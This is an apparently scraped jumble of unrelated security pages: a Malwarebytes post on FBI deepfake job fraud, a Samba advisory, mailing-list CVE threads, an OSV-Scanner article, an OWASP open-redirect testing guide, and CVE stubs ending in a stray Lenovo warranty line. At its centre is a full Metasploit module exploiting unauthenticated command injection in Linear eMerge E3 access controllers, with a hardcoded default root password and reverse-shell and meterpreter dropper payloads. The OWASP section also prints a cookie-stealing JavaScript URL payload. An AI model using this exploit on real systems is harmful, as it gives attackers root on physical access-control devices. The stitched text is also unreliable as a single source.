The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII.
The post Criminals are applying for remote work using deepfake and stolen identities, says FBI appeared first on Malwarebytes Labs.

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII (personally identifiable information).

A deepfake is essentially created or modified media (image, video, or audio), often with the help of artificial intelligence (AI) and machine learning (ML). Deepfake creations are designed to appear and sound as authentic as possible. Because of this, they’re difficult to spot unless you know what to look for.

Years of data breaches made millions of Americans’ identities available for anyone with ill intent to gather and use for personal gains. This time, criminals seem confident about pulling off a scheme that fully intends to sabotage or steal from companies that hire them while keeping their true identities intact.

Armed with compelling synthetic images and videos with legitimate PII, we can imagine criminals likely getting the job before pulling the wool over their employer’s eyes.

Most open positions identified in the report were in the technology field, such as IT (information technology), computer programming, database, and software. The FBI has also noted that some positions criminals are trying to fill would grant them access to PII, financial data, corporate databases, and proprietary information.

Fortunately for organizations, there is a glaring flaw to an otherwise masterful execution of deceit: the deepfakes the criminals use suffer from sync issues.

> “Complaints report the use of voice spoofing, or potentially voice deepfakes, during online interviews of the potential applicants. In these interviews, the actions and lip movement of the person seen interviewed on-camera do not completely coordinate with the audio of the person speaking. At times, actions such as coughing, sneezing, or other auditory actions are not aligned with what is presented visually.”
> 
> ~ FBI, PSA number I-062822-PSA

Misuse of stolen PII is spotted with a pre-employment background check. So even if an interviewer puts the desyncs in a deepfake video down to a dodgy connection, criminals won’t be able to escape findings from a standard background check.

TechCrunch said the most at-risk businesses from criminals entering the job market this way are startups and SaaS (software as a service) companies. This is because these potentially hold lots of data or access to it “but comparatively little security infrastructure compared with the enterprises they serve or are attempting to displace.”

If you’re worried that your data might be used to get criminals into the same sector as you are, there’s not much to do apart from remaining alert and keeping an eye out for strange emails or phone calls.

Stay safe!

Criminals are applying for remote work using deepfake and stolen identities, says FBI

Samba before versions 4.6.1, 4.5.7 and 4.4.11 are vulnerable to a malicious client using a symlink race to allow access to areas of the server file system not exported under the share definition.

**CVE-2017-2619.html:**

\====================================================================
== Subject:     Symlink race allows access outside share definition.
==
== CVE ID#:     CVE-2017-2619
==
== Versions:    All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12
==
== Summary:     A time-of-check, time-of-use race condition
==		can allow clients to access non-exported parts
==		of the file system via symlinks.
==
====================================================================

===========
Description
===========

All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12 are vulnerable to
a malicious client using a symlink race to allow access to areas of
the server file system not exported under the share definition.

Samba uses the realpath() system call to ensure when a client requests
access to a pathname that it is under the exported share path on the
server file system.

Clients that have write access to the exported part of the file system
via SMB1 unix extensions or NFS to create symlinks can race the server
by renaming a realpath() checked path and then creating a symlink. If
the client wins the race it can cause the server to access the new
symlink target after the exported share path check has been done. This
new symlink target can point to anywhere on the server file system.

This is a difficult race to win, but theoretically possible. Note that
the proof of concept code supplied wins the race reliably only when
the server is slowed down using the strace utility running on the
server. Exploitation of this bug has not been seen in the wild.

==================
Patch Availability
==================

A patch addressing this defect has been posted to

  http://www.samba.org/samba/security/

Additionally, Samba 4.6.1, 4.5.7 and 4.4.12 have been issued as
security releases to correct the defect. Patches against older Samba
versions are available at http://samba.org/samba/patches/. Samba
vendors and administrators running affected versions are advised to
upgrade or apply the patch as soon as possible.

==========
Workaround
==========

Add the parameter:

unix extensions = no

to the \[global\] section of your smb.conf and restart smbd. This
prevents SMB1 clients from creating symlinks on the exported file
system using SMB1.

However, if the same region of the file system is also exported using
NFS, NFS clients can create symlinks that potentially can also hit the
race condition. For non-patched versions of Samba we recommend only
exporting areas of the file system by either SMB or NFS, not both.

=======
Credits
=======

This problem was found by Jann Horn of Google. Jeremy Allison, of
Google and the Samba Team, and Ralph Boehme of SerNet and the Samba
Team provided the fix. Code review was performed by Uri Simchoni of
CTERA Networks and the Samba Team.

CVE-2017-2619: Samba - Security Announcement Archive

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

OSV-Scanner generates a list of dependencies in a project and checks the OSV database for known vulnerabilities, Google says.

Securing the software supply chain is an increasingly complex and time-consuming challenge for enterprises. To help developers find vulnerability data for open source components, Google launched OSV-Scanner on Tuesday.

Modern software development requires managing multiple dependencies – software libraries and components that add functionality to the application without having to develop them from scratch. Developers need to be aware of vulnerabilities which may exist in the components, but the task is complicated by the fact that each dependency potentially contains other dependencies.

A new report from the Station 9 research team at Endor Labs found that 95% of all vulnerabilities in open source software are found in transitive dependencies – code packages that are indirectly pulled into projects by other dependencies. Developers need to be able to manage vulnerabilities in the dependencies they selected as well as in these transitive dependencies. To complicate matters even more, the same research report found that even the latest version of a package could still have known vulnerabilities.

Last year, Google launched the OSV.dev service, a distributed open source vulnerability database, to help developers with vulnerability management. OSV.dev encompasses 16 different open source ecosystems and vulnerability databases, with a total of 38,000 advisories. The idea is to use the service for vulnerability tracking, triage, and patch automation. Google's Rex Pan calls OSV-Scanner, which connects a project's list of dependencies with the vulnerabilities that affect them, the "next step" in managing open source vulnerabilities.

With OSV-Scanner, developers can match code and dependencies against a list of known vulnerabilities and identify any available patches or newer versions of the software component. The scanner identifies all the transitive dependencies being used by the project by analyzing software manifests, software bill of materials, and commit hashes. The scanner then connects to OSV.dev to display the known vulnerabilities in the project.

The information generated by the scanner "closes the gap between a developer's list of packages and the information in vulnerability databases," Pan wrote in the blog post announcing the new tool. Features such as the ability to utilize specific function level vulnerability information automated remediation will be available in the future, Pan wrote.

OSV-Scanner automates the discovery and patching of vulnerabilities in the software supply chain. The 2021 United States Executive Order for Cybersecurity specifically included automated tools "that check for known and potential vulnerabilities and remediate them" as a requirement for national standards on secure software development.

Developers can download and try out OSV-Scanner from the osv.dev website or use OpenSSF Scorecard's Vulnerabilities check to automatically run the scanner on a GitHub project, Google says.

Google Launches Scanner to Uncover Open Source Vulnerabilities

CVE-2011-2696 libsndfile: Application crash due integer overflow by processing certain PAF audio files

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 14 Jul 2011 16:49:22 +1000
From: Erik de Castro Lopo <erikd@...a-nerd.com>
To: oss-security@...ts.openwall.com
Cc: Jan Lieskovsky <jlieskov@...hat.com>, "Steven M. Christey"
 <coley@...us.mitre.org>, Secunia Research <vuln@...unia.com>
Subject: Re: CVE Request -- libsndfile -- Integer overflow by processing
 certain PAF files

Jan Lieskovsky wrote:

>    an integer overflow, leading to heap-based buffer overflow flaw was
> found in the way libsndfile, library for reading and writing of sound
> files, processed certain PARIS Audio Format (PAF) audio files with
> crafted count of channels in the PAF file header. A remote attacker
> could provided a specially-crafted PAF audio file, which once opened by
> a local, unsuspecting user in an application, linked against libsndfile,
> could lead to that particular application crash (denial of service),

I agree with everything up to here.

> or, potentially arbitrary code execution with the privileges of the
> user running the application.

but this is rubbish. The heap gets overwritten with zeros which would
certainly lead to the application segfaulting. However, there is
no way for arbitrary code to be executed on amy sane OS with proper
memory protection.

Furthermore, Secunia when they contacted me about this said they would
release information about this vulernability on the 18th and then ended
up releasing it on the 12th instead which means I had to rush out the
release I was working on (and would have easily had ready for the
18th). That is not the way to win friends and influence people.

Regards,
Erik
-- 
----------------------------------------------------------------------
Erik de Castro Lopo
http://www.mega-nerd.com/

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2011-2696: oss-security - Re: CVE Request -- libsndfile -

SeedDMS v6.0.15 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Testing for Client Side URL Redirect**

ID

WSTG-CLNT-04

**Summary**

This section describes how to check for client side URL redirection, also known as open redirection. It is an input validation flaw that exists when an application accepts user-controlled input that specifies a link which leads to an external URL that could be malicious. This kind of vulnerability could be used to accomplish a phishing attack or redirect a victim to an infection page.

This vulnerability occurs when an application accepts untrusted input that contains a URL value and does not sanitize it. This URL value could cause the web application to redirect the user to another page, such as a malicious page controlled by the attacker.

This vulnerability may enable an attacker to successfully launch a phishing scam and steal user credentials. Since the redirection is originated by the real application, the phishing attempts may have a more trustworthy appearance.

Here is an example of a phishing attack URL.

    http://www.target.site?#redirect=www.fake-target.site
    

The victim that visits this URL will be automatically redirected to fake-target.site, where an attacker could place a fake page that resembles the intended site, in order to steal the victim’s credentials.

Open redirection could also be used to craft a URL that would bypass the application’s access control checks and forward the attacker to privileged functions that they would normally not be able to access.

**How to Test**

When testers manually check for this type of vulnerability, they first identify if there are client side redirections implemented in the client side code. These redirections may be implemented, to give a JavaScript example, using the window.location object. This can be used to direct the browser to another page by simply assigning a string to it. This is demonstrated in the following snippet:

    var redir = location.hash.substring(1);
    if (redir)
        window.location='http://'+decodeURIComponent(redir);
    

In this example, the script does not perform any validation of the variable redir which contains the user-supplied input via the query string. Since no form of encoding is applied, this unvalidated input is passed to the windows.location object, creating a URL redirection vulnerability.

This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string:

    http://www.victim.site/?#www.malicious.site
    

With a slight modification, the above example snippet can be vulnerable to JavaScript injection.

    var redir = location.hash.substring(1);
    if (redir)
        window.location=decodeURIComponent(redir);
    

This can be exploited by submitting the following query string:

    http://www.victim.site/?#javascript:alert(document.cookie)
    

When testing for this vulnerability, consider that some characters are treated differently by different browsers. For reference, see DOM-based XSS.

CVE-2021-39425: WSTG - v4.1 | OWASP Foundation

A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 14 Mar 2023 10:34:35 +0900
From: Jisoo Jang <jisoo.jang@...sei.ac.kr>
To: oss-security@...ts.openwall.com
Cc: Dokyung Song <dokyungs@...sei.ac.kr>, Minsuk Kang <linuxlovemin@...sei.ac.kr>
Subject: Re: A USB-accessible slab-out-of-bounds read in Linux kernel driver

This bug was assigned CVE-2023-1380.Best,
Jisoo

On Mon, Mar 13, 2023 at 8:10 PM Jisoo Jang <jisoo.jang@...sei.ac.kr> wrote:

> === Description ===
>
> A slab-out-of-bounds read bug was found in the Broadcom Full MAC Wi-Fi
> driver (e.g., brcmfmac.ko in the linux-modules-extra package in Ubuntu),
>
> The bug occurs in kmemdup() called from brcmf\_get\_assoc\_ies(), when
> assoc\_info->req\_len, data from a URB provided by a USB device, is bigger
> than the size of buffer which is defined as WL\_EXTRA\_BUF\_MAX.
>
> The driver duplicates the data of cfg->extra\_buf to conn\_info->req\_ie as
> much as assoc\_info->req\_le, which could exceed the size of the buffer.
>
> The data passes through cfg80211\_connect\_done(),
> \_\_cfg80211\_connect\_result(); in the end, it reaches
> nl80211\_send\_connect\_result() that will form netlink messages with the data
> read outside the bounds of the buffer.
>
> This data, which may contain sensitive information in the kernel, could be
> sent to a userspace socket by \_\_netlink\_sendskb() during this multicasting
> process.
>
> === Fix ===
>
> A patch was reported to the linux wireless mailing list and successfully
> reviewed by the maintainer.
>
> (
> https://lore.kernel.org/linux-wireless/20230309104457.22628-1-jisoo.jang@yonsei.ac.kr/T/#u
> )
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-1380: security - Re: A USB-accessible slab-out-of-bounds read in Linux kernel driver

WatchGuard Firebox and XTM appliances allow a remote attacker with unprivileged credentials to access the system with a privileged management session via exposed management access. This vulnerability impacts Fireware OS before 11.7.2_U1, 12.x before 12.1.3_U3, and 12.2.x through 12.5.x before 12.5.7_U3.

Username \*

Email Address \*

Email Notifications

I want to receive an email when...

a reply is left to one of my comments

a comment is left on a topic that I commented on

a comment is left on any topic in the Help system

An email has been sent to verify your new profile.Please fill out all required fields before submitting your information.

CVE-2022-23176: Fireware Release Notes

An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.

CVE-2022-33082: opa/compile.go at 598176de326025451025225aca53e85708d5f1db · open-policy-agent/opa

Cross-site Scripting (XSS) - Generic in GitHub repository ionicabizau/parse-url prior to 6.0.1

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-2217

**Cross site scripting in parse-url**

Moderate severity GitHub Reviewed Published Jun 28, 2022 • Updated Jul 5, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Package**

npm parse-url (npm)

**Affected versions**

< 6.0.1

**Description**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us